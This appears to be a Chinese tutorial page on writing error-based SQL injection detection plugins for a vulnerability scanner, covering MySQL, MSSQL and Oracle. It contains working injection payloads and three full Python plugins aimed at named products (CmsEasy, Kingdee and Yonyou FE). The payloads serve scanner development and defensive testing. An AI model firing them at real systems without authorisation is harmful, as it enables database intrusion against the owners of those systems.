基于报错的 SQL 注入


这一类的也叫有回显注入,页面会返回错误信息,或者是把注入语句的结果直接返回在页面中。

MySQL 数据库

方法:直接在结果中输出一个 md5 值

其 SQL 语句原型类似:

select md5(233);

实例

CmsEasy 5.5 UTF-8 20140802/celive/live/header.php SQL注入漏洞:

请求的目标 URL

http://xxx.com/celive/live/header.php

POST 数据内容(Payload)

xajax=LiveMessage&xajaxargs[0][name]=1',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(select md5(233)))a from information_schema.tables group by a)b),'','','','1','127.0.0.1','2') #

手动验证效果图

图 3-1

漏洞验证(伪代码)

md5(233) 的值为 e165421110ba03099a1c0393373c5b43

if 'e165421110ba03099a1c0393373c5b43' in 返回内容:
        security_hole(target, log=log)

范例插件

CmsEasy 5.5 UTF-8 20140802/celive/live/header.php SQL注入漏洞

感谢插件作者: 残废

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import urllib


def assign(service, arg):
    if service == fingerprint.cmseasy:
        return True, arg


def audit(arg):
    target = arg + '/celive/live/header.php'
    post_data = {
        'xajax': 'LiveMessage',
        'xajaxargs[0][name]': "1',(SELECT 1 FROM (select count(*),concat("
                              "floor(rand(0)*2),(select md5(233)))a from "
                              "information_schema.tables group by a)b),"
                              "'','','','1','127.0.0.1','2') #"
    }
    code, head, body, redirect_url, log = hackhttp.http(
        target, post=urllib.urlencode(post_data))
    if 'e165421110ba03099a1c0393373c5b43' in body:
        security_hole(target, log=log)

if __name__ == '__main__':
    from dummy import *
    audit(assign(fingerprint.cmseasy, 'http://localhost/cmseasy/')[1])

MSSQL 数据库

方法:直接在结果中输出一个 md5 值

其 SQL 语句原型类似:

select sys.fn_varbintohexstr(hashbytes('MD5','1234'));

hashbytes()返回 varbinary 类型值

sys.fn_VarBinToHexStr() 是把 varbinary 转换成 varchar

范例插件

金蝶办公系统 get_file.jsp SQL注入漏洞

感谢插件作者: Clown

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author:
# Name:金蝶办公系统 get_file.jsp SQL注入漏洞

import time

def assign(service, arg):
    if service == fingerprint.kingdee:
        return True, arg


def audit(arg):
    payload = 'Kingdee/disk/get_file.jsp?file_id=11%29%20and%201%3D2%20UNION%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2Csys.fn_varbintohexstr%28hashbytes%28%27MD5%27%2C%271234%27%29%29%2C9%2C10--'
    code,head, res, redirect_url, log = hackhttp.http(arg + payload)
    if code == 200 and '81dc9bdb52d04dc20036dbd8313ed055' in res:
        security_hole(arg + payload + "  :found sql Injection", log=log)


if __name__ == '__main__':
    from dummy import *
    audit(assign(fingerprint.kingdee,'http://www.example.com/')[1])

其中 Payload 是经过 URL 编码后的,解码后的 Payload 为:

payload = 'Kingdee/disk/get_file.jsp?file_id=11) and 1=2 UNION SELECT 1,2,3,4,5,6,7,sys.fn_varbintohexstr(hashbytes('MD5','1234')),9,10--'

Oracle 数据库

方法:Oracle 中输出 md5 值实现起来较为复杂,可以连续输出几个随机的字符来使判断字符串随机化

SQL 语句:

SELECT CHR(97)||CHR(108)||CHR(107)||CHR(100)||CHR(102)||CHR(106)||CHR(103)||CHR(99) FROM foobar

其效果相当于:

SELECT 'alkdfjgc' FROM foobar

这样只用检测 alkdfjgc 是否在返回页面中即可。

注意:所选字符串应该尽量无规律且要有一定长度,不要选用常见的单词(如 get, test, ceshi)。

范例

用友FE协作办公系统 feReport/chartList.jsp SQL 注入漏洞

原漏洞提及多处 SQL 注入,这里只选择其中 Oracle Union 注入:

Payload 为:

feReport/chartList.jsp?delId=1&reportId=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,bvuegrsycgaonod,NULL,NULL,NULL FROM DUAL--

bvuegrsycgaonod 转换后 Payload 为:

feReport/chartList.jsp?delId=1&reportId=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(98)||CHR(118)||CHR(117)||CHR(101)||CHR(103)||CHR(114)||CHR(115)||CHR(121)||CHR(99)||CHR(103)||CHR(97)||CHR(111)||CHR(110)||CHR(111)||CHR(100),NULL,NULL,NULL FROM DUAL--

示例插件

用友FE协作办公系统 feReport/chartList.jsp SQL 注入漏洞检测插件

感谢插件作者: 小光

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# 用友FE协作办公系统 feReport/chartList.jsp SQL 注入漏洞

import time

def assign(service, arg):
    if service == fingerprint.yongyou_fe:
        return True, arg


def audit(arg):
    payload = 'feReport/chartList.jsp%3FdelId%3D1%26reportId%3D1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCHR%2898%29%7C%7CCHR%28118%29%7C%7CCHR%28117%29%7C%7CCHR%28101%29%7C%7CCHR%28103%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%28121%29%7C%7CCHR%2899%29%7C%7CCHR%28103%29%7C%7CCHR%2897%29%7C%7CCHR%28111%29%7C%7CCHR%28110%29%7C%7CCHR%28111%29%7C%7CCHR%28100%29%2CNULL%2CNULL%2CNULL%20FROM%20DUAL--'
    code,head, res, redirect_url, log = hackhttp.http(arg + payload)
    if code == 200 and 'bvuegrsycgaonod' in res:
        security_hole(arg + payload + " : Found SQL Injection", log=log)


if __name__ == '__main__':
    from dummy import *
    audit(assign(fingerprint.yongyou_fe,'http://www.example.com/')[1])

results matching ""

    No results matching ""